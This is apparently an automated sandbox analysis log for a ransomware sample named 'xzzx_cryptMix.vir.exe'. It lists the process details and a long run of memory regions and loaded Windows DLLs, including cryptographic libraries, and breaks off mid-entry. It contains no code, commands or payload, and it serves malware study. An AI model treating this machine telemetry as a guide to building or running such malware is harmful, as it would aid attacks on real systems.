# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Oct 17 2017 16:08:19 # Log Creation Date: 14.11.2017 19:01:56.977 Process: id = "1" image_name = "xzzx_cryptmix.vir.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe" page_root = "0x654bc000" os_pid = "0x9c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 6 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 7 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 8 start_va = 0x55820000 end_va = 0x5585bfff entry_point = 0x55820000 region_type = mapped_file name = "xzzx_cryptmix.vir.exe" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe") Region: id = 9 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 12 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 13 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 14 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 15 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 16 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 17 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 150 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 151 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 152 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74be0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 153 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c40000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 154 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 155 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 156 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c90000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 157 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 158 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 159 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 160 start_va = 0x3f0000 end_va = 0x456fff entry_point = 0x3f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 161 start_va = 0x75010000 end_va = 0x75017fff entry_point = 0x75010000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 162 start_va = 0x75020000 end_va = 0x7505bfff entry_point = 0x75020000 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\SysWOW64\\pdh.dll" (normalized: "c:\\windows\\syswow64\\pdh.dll") Region: id = 163 start_va = 0x75060000 end_va = 0x750e3fff entry_point = 0x75060000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 164 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 165 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x75200000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 166 start_va = 0x75260000 end_va = 0x753bbfff entry_point = 0x75260000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 167 start_va = 0x75640000 end_va = 0x75651fff entry_point = 0x75640000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 168 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75660000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 169 start_va = 0x75750000 end_va = 0x757defff entry_point = 0x75750000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 170 start_va = 0x757e0000 end_va = 0x76429fff entry_point = 0x757e0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 171 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x76430000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 172 start_va = 0x76660000 end_va = 0x76686fff entry_point = 0x76660000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 173 start_va = 0x767d0000 end_va = 0x7689bfff entry_point = 0x767d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 174 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768a0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 175 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76ce0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 176 start_va = 0x76da0000 end_va = 0x76e1afff entry_point = 0x76da0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 177 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e20000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 178 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 179 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 180 start_va = 0x77000000 end_va = 0x7719cfff entry_point = 0x77000000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 181 start_va = 0x771a0000 end_va = 0x771f6fff entry_point = 0x771a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 182 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x77200000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 183 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x77670000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 184 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 185 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 186 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 187 start_va = 0x30000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 188 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 189 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 190 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 191 start_va = 0x460000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 192 start_va = 0x5f0000 end_va = 0x770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 193 start_va = 0x780000 end_va = 0x1b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 194 start_va = 0x1b80000 end_va = 0x1bfffff entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 195 start_va = 0x1d50000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 196 start_va = 0x1ef0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 197 start_va = 0x1f30000 end_va = 0x2322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f30000" filename = "" Region: id = 198 start_va = 0x24d0000 end_va = 0x24dffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 199 start_va = 0x74ff0000 end_va = 0x75005fff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 200 start_va = 0x74fe0000 end_va = 0x74fe7fff entry_point = 0x74fe0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 201 start_va = 0x74b40000 end_va = 0x74bbffff entry_point = 0x74b40000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 202 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 203 start_va = 0x1c00000 end_va = 0x1cdefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 204 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 205 start_va = 0x25e0000 end_va = 0x26a7fff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 206 start_va = 0x26b0000 end_va = 0x297efff entry_point = 0x26b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 207 start_va = 0x1f0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 208 start_va = 0x74e40000 end_va = 0x74fddfff entry_point = 0x74e40000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 209 start_va = 0x200000 end_va = 0x200fff entry_point = 0x200000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 210 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 211 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 212 start_va = 0x76900000 end_va = 0x76982fff entry_point = 0x76900000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 213 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 214 start_va = 0x1ce0000 end_va = 0x1d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 215 start_va = 0x1d60000 end_va = 0x1e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 216 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 217 start_va = 0x1e60000 end_va = 0x1e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 218 start_va = 0x2330000 end_va = 0x242ffff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 219 start_va = 0x74e20000 end_va = 0x74e35fff entry_point = 0x74e22dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 220 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 221 start_va = 0x1ea0000 end_va = 0x1edbfff entry_point = 0x1ea0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 222 start_va = 0x1ea0000 end_va = 0x1edbfff entry_point = 0x1ea128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 223 start_va = 0x1ea0000 end_va = 0x1edbfff entry_point = 0x1ea128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 224 start_va = 0x1ea0000 end_va = 0x1edbfff entry_point = 0x1ea128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 225 start_va = 0x1ea0000 end_va = 0x1edbfff entry_point = 0x1ea128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 226 start_va = 0x74de0000 end_va = 0x74e1afff entry_point = 0x74de128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 227 start_va = 0x75000000 end_va = 0x7500dfff entry_point = 0x75000000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 228 start_va = 0x1ea0000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 229 start_va = 0x2430000 end_va = 0x246ffff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 230 start_va = 0x24e0000 end_va = 0x25dffff entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 231 start_va = 0x2980000 end_va = 0x2a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 232 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 233 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 234 start_va = 0x2a80000 end_va = 0x2b3ffff entry_point = 0x2a80000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 235 start_va = 0x74ce0000 end_va = 0x74dd4fff entry_point = 0x74ce0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 236 start_va = 0x74cb0000 end_va = 0x74cd0fff entry_point = 0x74cb0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 237 start_va = 0x76eb0000 end_va = 0x76ef4fff entry_point = 0x76eb0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 238 start_va = 0x1d20000 end_va = 0x1d23fff entry_point = 0x1d20000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 239 start_va = 0x1d30000 end_va = 0x1d4dfff entry_point = 0x1d30000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000012.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000012.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000012.db") Region: id = 240 start_va = 0x1ee0000 end_va = 0x1ee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 241 start_va = 0x1d20000 end_va = 0x1d20fff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 242 start_va = 0x2470000 end_va = 0x24affff entry_point = 0x0 region_type = private name = "private_0x0000000002470000" filename = "" Region: id = 243 start_va = 0x2b40000 end_va = 0x2c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 244 start_va = 0x2c40000 end_va = 0x2c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 245 start_va = 0x2c80000 end_va = 0x2d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 246 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 247 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 248 start_va = 0x24b0000 end_va = 0x24b0fff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 249 start_va = 0x24c0000 end_va = 0x24c0fff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 250 start_va = 0x2d80000 end_va = 0x2d80fff entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 251 start_va = 0x2d90000 end_va = 0x2d90fff entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 252 start_va = 0x2da0000 end_va = 0x2e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 253 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 254 start_va = 0x2eb0000 end_va = 0x2eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 255 start_va = 0x2ec0000 end_va = 0x2ec0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 256 start_va = 0x2ed0000 end_va = 0x2ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 257 start_va = 0x2ee0000 end_va = 0x2ee0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 258 start_va = 0x2ef0000 end_va = 0x2ef0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 259 start_va = 0x2f00000 end_va = 0x2f00fff entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 260 start_va = 0x2f10000 end_va = 0x2f10fff entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 261 start_va = 0x2f20000 end_va = 0x301ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 262 start_va = 0x3020000 end_va = 0x3020fff entry_point = 0x0 region_type = private name = "private_0x0000000003020000" filename = "" Region: id = 263 start_va = 0x3030000 end_va = 0x3030fff entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 264 start_va = 0x3040000 end_va = 0x3040fff entry_point = 0x0 region_type = private name = "private_0x0000000003040000" filename = "" Region: id = 265 start_va = 0x3050000 end_va = 0x3050fff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 266 start_va = 0x3060000 end_va = 0x3060fff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 267 start_va = 0x3070000 end_va = 0x3070fff entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 268 start_va = 0x3080000 end_va = 0x3080fff entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 269 start_va = 0x3090000 end_va = 0x3090fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 270 start_va = 0x30a0000 end_va = 0x30a0fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 271 start_va = 0x30b0000 end_va = 0x30effff entry_point = 0x0 region_type = private name = "private_0x00000000030b0000" filename = "" Region: id = 272 start_va = 0x30f0000 end_va = 0x31effff entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 273 start_va = 0x31f0000 end_va = 0x31f0fff entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 274 start_va = 0x3200000 end_va = 0x3200fff entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 275 start_va = 0x3210000 end_va = 0x3210fff entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 276 start_va = 0x3220000 end_va = 0x3220fff entry_point = 0x0 region_type = private name = "private_0x0000000003220000" filename = "" Region: id = 277 start_va = 0x3230000 end_va = 0x3230fff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 278 start_va = 0x3240000 end_va = 0x3240fff entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 279 start_va = 0x3250000 end_va = 0x3250fff entry_point = 0x0 region_type = private name = "private_0x0000000003250000" filename = "" Region: id = 280 start_va = 0x3260000 end_va = 0x3260fff entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 281 start_va = 0x3270000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 282 start_va = 0x32b0000 end_va = 0x33affff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 283 start_va = 0x33b0000 end_va = 0x33b0fff entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 284 start_va = 0x33c0000 end_va = 0x33c0fff entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 285 start_va = 0x33d0000 end_va = 0x33d0fff entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 286 start_va = 0x33e0000 end_va = 0x33e0fff entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 287 start_va = 0x33f0000 end_va = 0x33f0fff entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 288 start_va = 0x3400000 end_va = 0x3400fff entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 289 start_va = 0x3410000 end_va = 0x3410fff entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 290 start_va = 0x3420000 end_va = 0x345ffff entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 291 start_va = 0x3460000 end_va = 0x355ffff entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 292 start_va = 0x3560000 end_va = 0x359ffff entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 293 start_va = 0x35a0000 end_va = 0x369ffff entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 294 start_va = 0x36a0000 end_va = 0x36dffff entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 295 start_va = 0x36e0000 end_va = 0x37dffff entry_point = 0x0 region_type = private name = 